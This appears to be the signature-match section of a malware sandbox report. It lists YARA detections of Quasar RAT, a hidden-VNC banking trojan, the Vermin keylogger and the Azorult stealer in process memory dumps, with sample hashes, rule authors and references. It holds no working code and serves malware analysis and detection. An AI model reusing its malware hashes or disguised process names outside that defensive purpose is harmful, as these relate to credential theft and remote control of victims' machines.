Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
